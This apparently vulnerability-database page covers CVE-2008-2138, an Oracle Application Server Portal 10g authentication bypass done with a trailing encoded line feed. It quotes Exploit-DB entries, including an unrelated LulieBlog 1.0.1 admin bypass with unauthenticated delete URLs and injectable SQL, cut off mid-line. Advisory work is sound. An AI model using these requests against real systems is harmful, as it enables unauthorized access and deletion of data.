CVE-2008-2138
published 2008-05-12CVE-2008-2138: Oracle Application Server (OracleAS) Portal 10g allows remote attackers to bypass intended access restrictions and read the contents of /dav_portal/portal/ by…
PriorityP336medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
15.51%
96.4th percentile
Oracle Application Server (OracleAS) Portal 10g allows remote attackers to bypass intended access restrictions and read the contents of /dav_portal/portal/ by sending a request containing a trailing "%0A" (encoded line feed), then using the session ID that is generated from that request. NOTE: as of 20080512, Oracle has not commented on the accuracy of this report.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | application_server_portal | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Oracle Application Server Portal 10g - Authentication Bypass
exploitdb·2008-05-09
CVE-2008-2138 Oracle Application Server Portal 10g - Authentication Bypass
Oracle Application Server Portal 10g - Authentication Bypass
---
source: https://www.securityfocus.com/bid/29119/info
Oracle Application Server Portal is prone to a authentication-bypass vulnerability because the application fails to properly restrict access to certain resources.
An attacker can exploit this vulnerability to bypass certain security restrictions and gain access to potentially sensitive contents of the portal.
Oracle Application Server Portal 10g is vulnerable to this issue; other versions may also be affected.
Visiting the 'http://www.example.com/portal/%0A' site will create a cookie sufficient to trigger the issue and access 'http://www.example.com/dav_portal/porta/' without authorization.
Exploit-DB
LulieBlog 1.0.1 - Remote Authentication Bypass
exploitdb·2008-01-15
CVE-2008-0329 LulieBlog 1.0.1 - Remote Authentication Bypass
LulieBlog 1.0.1 - Remote Authentication Bypass
---
LulieBlog 1.0.1 (delete id) Remote Admin Bypass Vulnerability
bug found by ka0x
contact:
D.O.M TEAM 2008
we are: ka0x, an0de, xarnuz
#from spain
download: http://www.comscripts.com/scripts/php.lulieblog.2138.html
Description:
- The bug will allow us to acept sent comments in the articles,
erase comments and delete articles
accept comments:
http://[host]/Admin/comment_accepter.php?id=[id_comment]
$id=$_GET["id"];
$sql="UPDATE ".PREFIX_TABLES."commentaire SET actif = 1 WHERE idcom = '$id'";
delete comments:
http://[host]/Admin/comment_refuser.php?id=[id_comment]
$id=$_GET["id"];
$sql="DELETE FROM ".PREFIX_TABLES."commentaire WHERE idcom = '$id'";
delete article:
http://[host]/Admin/article_suppr.php?id=[id_article]
$id=$_GET["i
No writeups or analysis indexed.
http://secunia.com/advisories/30140http://securityreason.com/securityalert/3867http://www.securityfocus.com/archive/1/491865/100/0/threadedhttp://www.securityfocus.com/bid/29119http://www.securitytracker.com/id?1020034https://exchange.xforce.ibmcloud.com/vulnerabilities/42302http://secunia.com/advisories/30140http://securityreason.com/securityalert/3867http://www.securityfocus.com/archive/1/491865/100/0/threadedhttp://www.securityfocus.com/bid/29119http://www.securitytracker.com/id?1020034https://exchange.xforce.ibmcloud.com/vulnerabilities/42302
2008-05-12
Published